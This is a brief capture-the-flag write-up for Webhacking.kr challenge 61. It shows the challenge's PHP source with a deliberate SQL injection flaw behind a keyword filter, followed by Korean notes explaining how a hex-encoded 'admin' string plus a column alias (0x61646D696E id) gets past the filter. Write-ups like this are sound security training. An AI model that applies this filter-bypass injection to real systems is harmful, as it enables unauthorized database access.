Webhacking.kr - web61
web61
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
include "../../config.php";
if($_GET['view_source']) view_source();
$db = dbconnect();
if(!$_GET['id']) $_GET['id']="guest";
echo "<html><head><title>Challenge 61</title></head><body>";
echo "<a href=./?view_source=1>view-source</a><hr>";
$_GET['id'] = addslashes($_GET['id']);
if(preg_match("/\(|\)|select|from|,|by|\./i",$_GET['id'])) exit("Access Denied");
if(strlen($_GET['id'])>15) exit("Access Denied");
$result = mysqli_fetch_array(mysqli_query($db,"select {$_GET['id']} from chall61 order by id desc limit 1"));
echo "<b>{$result['id']}</b><br>";
if($result['id'] == "admin") solve(61);
echo "</body></html>";
?>
Solution
1
2
3
4
5
6
select, from, by, '(', ')', ',' , '.' -> 필터링
결과 값은 id 컬럼만 보여줌.
select 'admin' id -> 안나옴..
그래서 admin을 hex 값으로 바꿔서 하니까 성공
?id=0x61646D696E%20id
This post is licensed under CC BY 4.0 by the author.